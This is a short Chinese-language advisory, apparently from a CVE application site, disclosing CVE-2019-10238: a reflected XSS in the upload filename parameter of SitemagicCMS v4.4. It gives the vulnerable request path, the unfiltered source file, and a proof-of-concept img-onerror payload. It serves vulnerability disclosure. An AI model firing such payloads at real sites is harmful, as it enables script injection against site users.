CVE中文申请站

一、漏洞摘要

漏洞名称: SitemagicCMS上传参数存在反射型XSS
上报日期: 2019-03-23
漏洞发现者: F1y1nth3sky
产品首页: https://github.com/Jemt/SitemagicCMS
软件链接: https://github.com/Jemt/SitemagicCMS
版本: v4.4
CVE编号: CVE-2019-10238


二、漏洞概述

上传处filename参数存在XSS
/SitemagicCMS/index.php?SMFilesUpload&SMExecMode=Dedicated&SMExt=SMFiles&SMFilesUploadPath=files/images&SMTemplateType=Basic
extensions/SMFiles/FrmUpload.class.php:对参数没有进行过滤
11.png


三、利用代码

filename="xss<img src="/zh_CN/htmledition/images/transparent.png" lazysrc=1 onerror=alert(1)>"

22.png

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/175/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10238
exploit-db:发布中

标签: XSS, SitemagicCMS